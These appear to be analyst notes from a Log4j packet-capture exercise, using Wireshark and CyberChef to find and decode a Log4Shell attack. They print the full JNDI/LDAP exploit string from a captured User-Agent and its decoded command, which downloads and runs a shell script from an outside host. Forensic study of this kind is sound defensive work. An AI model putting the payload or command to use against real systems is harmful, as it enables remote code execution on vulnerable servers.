LOG4J ANALYSIS

root@dco:~$ wireshark &

root@dco:~$ Wireshark
WireShark > File > Open > Desktop/exercise-pcaps/http/http.pcapng

#step 1: get an overview
WireShark
 Filter: http.request.method == "POST" && http.user_agent contains $
 
 * 444	3163.829852	45.137.21.9	198.71.247.91	HTTP	447	${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}	POST / HTTP/1.1 
 
WireShark > Packet List > Packet Details > right-click user-agent > Copy > Value
 ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
 
root@dco:~$ cyberchef.io
 input: d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==
 recipe: From Base64
 recipe: Defang IP Addresses
 output: wget http://62[.]210[.]130[.]250/lh.sh;chmod +x lh.sh;./lh.sh
 
 * be aware that sophisticated APTs or adversaries can modify the user-agent data to match legitimate user-agents used by web browsers